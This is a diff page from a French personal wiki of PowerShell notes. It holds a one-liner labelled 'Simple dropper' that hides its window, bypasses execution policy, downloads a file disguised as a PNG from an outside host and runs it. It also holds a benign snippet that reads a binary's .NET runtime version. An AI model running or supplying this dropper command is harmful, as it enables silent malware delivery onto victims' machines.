PowerShell : Différence entre versions

De UnixWiki
Aller à : navigation, rechercher
(Page créée avec « Simple dropper powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... »)
 
Ligne 2 : Ligne 2 :
   
 
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
  
powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')
  +
  +
  +
  +
Find the framework version of a binary
  +
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
  +
v2.0.50727

Version du 31 octobre 2017 à 16:40

Simple dropper 

 powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')


Find the framework version of a binary 

 [Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
 v2.0.50727
Récupérée de « https://futex.re/mediawiki/index.php?title=PowerShell&oldid=2577 »